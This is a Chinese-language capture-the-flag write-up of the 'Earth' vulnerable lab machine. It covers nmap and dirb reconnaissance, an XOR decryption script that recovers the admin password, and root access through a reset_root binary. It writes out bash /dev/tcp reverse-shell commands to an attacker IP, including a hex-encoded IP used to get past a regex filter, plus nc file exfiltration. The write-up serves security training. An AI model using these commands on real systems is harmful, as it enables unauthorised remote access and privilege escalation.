0x01信息收集
1.1、nmap扫描
IP段扫描,确定靶机地址
平扫描
nmap 192.168.1.0/24
扫描结果(部分)
Nmap scan report for earth.local (192.168.1.129)
Host is up (0.0015s latency).
Not shown: 983 filtered tcp ports (no-response), 14 filtered tcp ports (admin-prohibited)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:61:E4:BE (VMware)
或者全端口全脚本ip段扫描(慢)
nmap -A -p- -v 192.168.1.0/24
扫描结果
TRACEROUTE
HOP RTT ADDRESS
1 2.57 ms 192.168.1.2Nmap scan report for earth.local (192.168.1.129)
Host is up (0.0015s latency).
Not shown: 65369 filtered tcp ports (no-response), 163 filtered tcp ports (admin-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_ 256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-title: Earth Secure Messaging
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Issuer: commonName=earth.local/stateOrProvinceName=Space
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-12T23:26:31
| Not valid after: 2031-10-10T23:26:31
| MD5: 4efa:65d2:1a9e:0718:4b54:41da:3712:f187
|_SHA-1: 04db:5b29:a33f:8076:f16b:8a1b:581d:6988:db25:7651
| tls-alpn:
|_ http/1.1
|_http-title: Earth Secure Messaging
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
MAC Address: 00:0C:29:61:E4:BE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), Synology DiskStation Manager 5.X (90%), Netgear RAIDiator 4.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28
Aggressive OS guesses: Linux 4.15 - 5.8 (97%), Linux 5.0 - 5.4 (97%), Linux 5.0 - 5.5 (95%), Linux 5.4 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.4 - 3.10 (91%), Linux 2.6.32 - 3.10 (91%), Linux 2.6.32 - 3.13 (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 19.199 days (since Tue Sep 17 23:32:55 2024)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
得到信息
IP:192.168.1.129
开放端口:22 ssh 80 http 443 ssl
及其服务版本号
1.1.1服务查看
22端口——ssh服务
80端口——http(尝试ip访问界面)
访问没有结果
443端口——ssl(尝试重新访问)
ip访问是Fedora Webserver Test Page页面,尝试使用域名访问
发现443端口有DNS解析 DNS:earth.local, DNS:terratest.earth.local,在hosts文件中添加DNS解析
192.168.1.129 earth.local
192.168.1.129 terratest.earth.local
1.2、网页信息收集
添加完成访问页面
http://earth.local/
发现Previous Messages:
0d4252435841450f50435d45191349424213180d4252435841451e0f
0d4252435841450f50435d45191349424213180d4252435841451e0f
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a
继续访问
https://terratest.earth.local/
在扫描中我们发现有ssl服务在这里其实我们两个网址都可以用https
1.3、目录扫描
earth.local目录扫描:
dirb https://earth.local/
结果:
┌──(root㉿kali)-[/etc]
└─# dirb https://earth.local/-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Mon Oct 7 04:36:07 2024
URL_BASE: https://earth.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612---- Scanning URL: https://earth.local/ ----
+ https://earth.local/admin (CODE:301|SIZE:0)
+ https://earth.local/cgi-bin/ (CODE:403|SIZE:199)-----------------
END_TIME: Mon Oct 7 04:36:34 2024
DOWNLOADED: 4612 - FOUND: 2
发现可疑目录:admin
terratest.earth.local目录扫描
dirb https://terratest.earth.local/
结果:
┌──(root㉿kali)-[/etc]
└─# dirb https://terratest.earth.local/-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Mon Oct 7 04:38:50 2024
URL_BASE: https://terratest.earth.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612---- Scanning URL: https://terratest.earth.local/ ----
+ https://terratest.earth.local/cgi-bin/ (CODE:403|SIZE:199)
+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)-----------------
END_TIME: Mon Oct 7 04:39:01 2024
DOWNLOADED: 4612 - FOUND: 3
发现可疑文件:robots.txt
1.3.1、访问目录
分别对admin、robots.txt进行访问
admin:
发现登录界面
robots.txt
发现文件Disallow: /testingnotes.*但不知道格式,进行爆破得到为txt格式
测试安全消息系统注意事项:
*使用XOR加密作为算法,在RSA中使用应该是安全的。
*地球已确认他们已收到我们发送的信息。
*testdata.txt 用于测试加密。
*terra 用作管理门户的用户名。
去做:
*我们如何安全地将每月的密钥发送到地球? 或者我们应该每周更换钥匙?
*需要测试不同的密钥长度以防止暴力破解。 钥匙应该多长时间?
*需要改进消息界面和管理面板的界面,目前非常基础。
告诉我们加密算法是 XOR,并且有一个testdata.txt文档用于测试加密,用户名是terra,先访问testdata.txt并保存:
0x02漏洞攻击
1.1、XOR解密
写个简单py脚本,选一个Previous Messages数据,然后与 testdata.txt 进行一下 XOR 运算,得到密钥
脚本():
import binasciidata1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"
data2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
data3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"d1 = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
d2 = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
d3 = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()print(hex(int(data1, 16) ^ int(d1, 16)))
print(hex(int(data2, 16) ^ int(d2, 16)))
print(hex(int(data3, 16) ^ int(d3, 16)))
得到结果
0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973436679202f2f7d6f6d6f3b2f70706561726527327e643b7f662427782c7f6a6a3d2a616c66332c6f717c79247736267c25516a76772b55203c40663b792f6a7f6b72307e683c506a31732e3d066997f3dc732d712c3c6a247b75676e247536267f2a2b6f2765726c6a7c6d6e6e2f3f3b2d277f31252c667b6b78382e607f6229228ce5996e70607573742a797a64317d7862693a6f7b297e73687d2c5e3623546a637937616a2c796e3e4868752d17736b6c2924496e2a27792f6479626a377074347e7522743d356a6768262379782a2b6677693d2f65617079726e63616e786b797f382f6b3c0b363d2b3180e8da712a497238786f22507c377766626e
0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973746f72792c206c69666520617070656172656420696e20746865206f6365616e7320616e6420626567616e20746f2061666665637420456172746827732061746d6f73706865726520616e6420737572666163652c206c656164696e6720746f207468652070726f6c5e72726c6a7e3c6576797f7b262a786b7c68246b61772d6f6320302d2777656231343669716324687465376166236065637e296f3e6b466e6b756b7a64747c613e797e63697976627e6a6e24364f3f30697e7f647c30767c246c78347e25356c33642a606d783661387b76636b65746469612025652c7b747239783e717b3177246826767e6f6178782d296966347476367075646b
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174
分别对其进行十六进制转文本解码:
得第三个解密:
earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat
根据前面猜测密码是:earthclimatechangebad4humans
1.2、登录后台
用户名:terra
密 码:earthclimatechangebad4humans
1.3、命令执行
看起来像是个命令执行接口,让我们小心使用
反弹一个shell看看
bash -c 'exec bash -i &>/dev/tcp/192.168.1.128/6666 <&1'
发现没有用,翻一下有啥吧
查找 flag相关文件
find / -name "*flag*"
发现第一个flag
Command output: [user_flag_3353b67d6437f07ba7d34afd7d2fc27d]
继续翻
看看ls /var/www/html/terratest.earth.local有啥没有可用的
最后在/var/earth_web/secure_message/forms.py发现了服务器段采用了正则对IP进行数字匹配
1.4、shell反弹
把ip地址转换为16进制试试反弹
bash -c 'exec bash -i &>/dev/tcp/0xc0.0xa8.0x01.0x80/6666 <&1'
发现反弹成功
1.5、提权
查找可用权限
发现一个reset_root 运行一下
发现用不了
把文件导出来看看
nc -nlvp 7777 >reset_rootnc 192.168.1.129 7777 < /usr/bin/reset_root
使用 strace 命令进行调试
发现没有权限,给权调试一下看看
strace ./reset_root
发现缺失了三个文件,在靶机里面也没有
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK) = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK) = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK) = -1 ENOENT (No such file or directory)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0) = ?
+++ exited with 0 +++
在靶机里面创建三个文件之后运行reset_root
提权成功
查找flag
拿到flag